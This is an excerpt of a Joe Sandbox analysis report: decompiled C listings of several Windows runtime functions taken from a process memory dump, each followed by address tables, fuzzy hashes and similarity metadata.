				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E036E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E036E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E036E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E036E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03747794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x036eae78
0x036eae7c
0x036eae7e
0x036eae81
0x036eae86
0x036eae8d
0x03732691
0x036eae93
0x036eae93
0x036eae93
0x036eae98
0x036eae9d
0x037326a2
0x037326b4
0x037326a4
0x037326ad
0x037326ad
0x037326b9
0x00000000
0x037326bb
0x00000000
0x037326bb
0x036eaea3
0x036eaea3
0x036eaea3
0x036eaeaa
0x037326c0
0x037326c9
0x037326c9
0x036eaeb3
0x037326d4
0x037326e1
0x00000000
0x00000000
0x037326e7
0x037326ee
0x037326f0
0x037326f9
0x037326f9
0x03732702
0x03732708
0x03732708
0x0373270b
0x0373270f
0x03732711
0x03732711
0x03732725
0x03732725
0x00000000
0x036eaeb9
0x036eaeb9
0x036eaebf
0x036eaebf
0x036eaeb3

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 24586c08ff82242a3a6111e78cfd62905be09e4afbcec3103eec0eac1e673680
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: B421D171A02684DFDB26DBA9D944B2577E8EF45240F1D04E4DD048BBA3E734DC41C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 036FFD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E036FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E036D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x036ffd9b
0x036ffda0
0x036ffda1
0x036ffdab
0x036ffdad
0x036ffdb0
0x036ffdb8
0x036ffe0f
0x036ffde6
0x036ffde9
0x036ffdec
0x0373c0c0
0x036ffdfe
0x036ffe06
0x036ffe06
0x0373c0c8
0x036ffe2d
0x036ffe2d
0x00000000
0x036ffe2d
0x0373c0d1
0x0373c0e0
0x0373c0e5
0x0373c0e5
0x0373c0e8
0x00000000
0x0373c0e8
0x036ffdf4
0x00000000
0x00000000
0x036ffdf6
0x036ffdfa
0x036ffe1a
0x036ffe1f
0x036ffe1f
0x036ffdfc
0x00000000
0x036ffdfc
0x036ffdcc
0x036ffdd0
0x036ffe26
0x00000000
0x036ffe26
0x036ffdd8
0x036ffddb
0x036ffddd
0x036ffde0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b5953e0c51871b0f5fbf1709cdeaa412efd73ae30047313f8d8e415219cbd477
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 26217972A00A45EFC735CF0AC640A66F7E9EB94A10F28816EEA498B711D731AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 036D841F Relevance: .1, Instructions: 64
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E036D841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E03709810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}

0x036d842f
0x036d8448
0x036d844e
0x036d8459
0x036d845b
0x036d8464
0x03729ac3
0x03729ac3
0x03729ac5
0x03729acb
0x00000000
0x00000000
0x03729acd
0x03729acd
0x03729ad1
0x03729ae9
0x036d846a
0x036d8475
0x036d8479
0x036d847c
0x036d8481
0x036d8482
0x036d849a

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction ID: 3c598c6e739885039e62d03f6d9477de497797002543adabfcc446aa7bdec70d
Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
Instruction Fuzzy Hash: A921A276E00129DBCB14CFA9C58068AF7F9FB8C350F664165EA08B7340C630AE04CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 036FB390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E036FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E036E2280(_t12, 0x37b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E037000C2(0x37b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x036fb395
0x036fb3a2
0x036fb3a5
0x036fb3aa
0x036fb3b2
0x036fb3ba
0x036fb3bd
0x036fb3c0
0x036fb3c4
0x036fb3c9
0x0373a3e9
0x0373a3ed
0x0373a3f0
0x0373a3ff
0x0373a403
0x0373a409
0x00000000
0x00000000
0x0373a40b
0x0373a40b
0x0373a40f
0x0373a415
0x0373a423
0x0373a423
0x0373a415
0x036fb3d1
0x036fb3e8
0x036fb3e8
0x036fb3d9

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beaf0cb50ec9e253d3c9cca5a713a6ffcc5e7dc548a06d37f71021943f0ae7ac
Instruction ID: 8d9563f755c9d72ccfda3813baa17035d5dc07cf44ca7d2c13b6c64f354aef9d
Opcode Fuzzy Hash: beaf0cb50ec9e253d3c9cca5a713a6ffcc5e7dc548a06d37f71021943f0ae7ac
Instruction Fuzzy Hash: A4116B373412189FCB18DA14DE81B6BB2ABEBC9330B28013DDE16CB380C9719C02C695

Uniqueness

Uniqueness Score: -1.00%

Function 036C9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E036C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x379f708);
				E0371D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E037095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E037095D0();
				_t33 =  *0x37b84c4; // 0x0
				L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x37b84c4; // 0x0
				L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x37b84c4; // 0x0
				E036E2280(L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x37b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E037095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E037095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E036C9325();
					_t50 =  *0x37b84c4; // 0x0
					return E0371D0D1(L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x036c9240
0x036c9242
0x036c9247
0x036c924c
0x036c924e
0x036c9255
0x036c9257
0x036c925a
0x036c925f
0x036c925f
0x036c9266
0x036c9271
0x036c9276
0x036c9279
0x036c927e
0x036c9295
0x036c929a
0x036c92b1
0x036c92b6
0x036c92d7
0x036c92dc
0x036c92e0
0x036c92e6
0x036c92e8
0x036c92ee
0x036c9332
0x036c9333
0x036c9337
0x036c9338
0x036c933a
0x036c933a
0x036c933d
0x036c9342
0x036c9342
0x036c9345
0x036c9349
0x036c934e
0x036c9352
0x036c9357
0x036c92f4
0x036c92f4
0x036c92f6
0x036c92f9
0x036c9300
0x036c9306
0x036c9324
0x036c9324

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bf2b22a85c57f4f605fe46ce6217ea7be639138a5c6391bf14b1ea0b690d3cf
Instruction ID: d1746f719851782f3d55d127cb81c6388ad040dae1a525b5a436e2f77f0418b0
Opcode Fuzzy Hash: 5bf2b22a85c57f4f605fe46ce6217ea7be639138a5c6391bf14b1ea0b690d3cf
Instruction Fuzzy Hash: 4F214876051A40EFC725EF68CA04F29B7F9FF08704F14456CE0498B6A2DB38E951DB48

Uniqueness

Uniqueness Score: -1.00%

Function 03754257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E03754257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x37a08d0);
				E0371D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E037541E8(__ebx, __edi, __ecx, _t39);
				E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x37b87e4;
					_t18 =  *0x37b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x37b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x37b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x37b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L036C7055(_t31 + 0xfffffff8);
								_t24 =  *0x37b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x37b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x37b5cd0;
				if( *0x37b5cd0 <= 0) {
					L036C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x37b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x37b87e8 = _t30;
						 *0x37b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0371D0D1(L03754320());
			}

0x03754257
0x03754257
0x03754257
0x03754259
0x0375425e
0x03754263
0x03754265
0x03754273
0x03754278
0x0375427c
0x0375427f
0x03754281
0x03754287
0x037542d7
0x037542d7
0x037542da
0x0375428d
0x0375428d
0x0375428f
0x03754292
0x03754297
0x0375429c
0x037542a0
0x037542a6
0x037542a8
0x037542ae
0x037542b3
0x00000000
0x037542ba
0x037542ba
0x037542bf
0x037542c5
0x037542ca
0x037542cf
0x037542d0
0x00000000
0x037542d0
0x037542b3
0x00000000
0x037542a6
0x0375429c
0x037542dc
0x037542dc
0x037542e3
0x03754309
0x037542e5
0x037542e5
0x037542e8
0x037542ee
0x037542f0
0x00000000
0x037542f2
0x037542f2
0x037542f4
0x037542f7
0x037542f9
0x03754300
0x03754300
0x037542f0
0x0375430e
0x0375431f

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8da24ddb48f0b38c5c0f96639df79d11995eed7fe8c967bd34997f59ab8feb3e
Instruction ID: 4793a020b219506b4f6d32e83aae8efe6f2636fb21d0f86f2d577230c72374f3
Opcode Fuzzy Hash: 8da24ddb48f0b38c5c0f96639df79d11995eed7fe8c967bd34997f59ab8feb3e
Instruction Fuzzy Hash: C221BB71500750DFCB58EFA9D000A14BBF9FB85319B24C2AEE5098F294EB79C482CF41

Uniqueness

Uniqueness Score: -1.00%

Function 036F2397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E036F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x37b848c != 0) {
					L036EFAD0(0x37b8610);
					if( *0x37b848c == 0) {
						E036EFA00(0x37b8610, _t19, _t27, 0x37b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E036F2581(0x37b8610, 0x36a50a0, _t26, _t27, _t28);
						E036EFA00(0x37b8610, 0x36a50a0, _t27, 0x37b8610);
					}
				} else {
					L1:
					_t11 =  *0x37b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03704886(0x36a1088, 1, 0x37b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E036F2581(0x37b8610, (_t11 << 4) + 0x36a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x036f23b0
0x036f23b6
0x036f2409
0x036f2415
0x03735ae9
0x00000000
0x036f241b
0x036f241b
0x036f241d
0x036f2427
0x036f242e
0x036f2430
0x036f2430
0x036f23b8
0x036f23b8
0x036f23b8
0x036f23bf
0x036f23fc
0x036f23fc
0x036f23c1
0x036f23c3
0x036f23d0
0x036f23d8
0x036f23d8
0x036f23dc
0x036f23de
0x036f23e1
0x036f23e1
0x036f23ec

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee00f889814f0432479d36ea7a820420c12681a4fb532e328df235bcac707ec
Instruction ID: 5be483f06cc30d39170c45a65fe0d7dd84484c3a07134ce8190730567bf6ae6b
Opcode Fuzzy Hash: 4ee00f889814f0432479d36ea7a820420c12681a4fb532e328df235bcac707ec
Instruction Fuzzy Hash: C9112B76604744AFD720EA2D9C94F16B7EDEB90610F18882AF7029F281D6B4DC05DF59

Uniqueness

Uniqueness Score: -1.00%

Function 037446A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E037446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0370F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E036FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L036E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x037446b7
0x037446ba
0x037446c5
0x037446c8
0x037446d0
0x037446d4
0x037446e6
0x037446e9
0x037446f4
0x037446ff
0x03744705
0x03744706
0x0374470c
0x03744713
0x0374471b
0x03744723
0x03744725
0x037446d6
0x037446d9
0x037446db
0x037446db
0x03744732

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 44d4fe312183ae72f26fd55302bfdf16e3d40270dfda657b726fbb0408c0e96c
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 9C110276504208BBCB05DF6DD8809BEB7B9EF85300F1080AEF9448B350DA319D55D3A8

Uniqueness

Uniqueness Score: -1.00%

Function 036CC962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E036CC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x37bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E036DEEF0(0x37b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0374F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E036DEB70(_t29, 0x37b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0370B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0374F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x37b70c0; // 0x0
					while(_t38 != 0x37b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x37bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x036cc96a
0x036cc974
0x036cc988
0x036cc98a
0x03737c9d
0x03737c9f
0x03737ca4
0x03737cae
0x03737cf0
0x03737cf5
0x03737cfa
0x036cc992
0x036cc996
0x036cc997
0x036cc998
0x036cc9a3
0x036cc9a3
0x03737cb0
0x03737cb7
0x03737cbb
0x00000000
0x00000000
0x03737cbd
0x03737ce8
0x03737cc5
0x03737cc8
0x03737cca
0x03737cd0
0x03737cd6
0x03737cde
0x03737ce4
0x03737ce4
0x03737cd0
0x00000000
0x03737ce8
0x036cc990
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b599cec7be351785033940ffecd78a11fbcd5f8918073d34de3339f53269724e
Instruction ID: 688978db4522c643c3d2cd0875b3ee811d615f531320a80be13cebd1199fce22
Opcode Fuzzy Hash: b599cec7be351785033940ffecd78a11fbcd5f8918073d34de3339f53269724e
Instruction Fuzzy Hash: 2911E17170078A9FC718EF28DC85A6BB7F9FF89610B040539E9458B652EB20EC10D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 037037F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E037037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E036E2280(_t6, 0x37b8550);
				}
				_t29 = E0370387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E036DFFB0(0x37b8550, _t27, 0x37b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
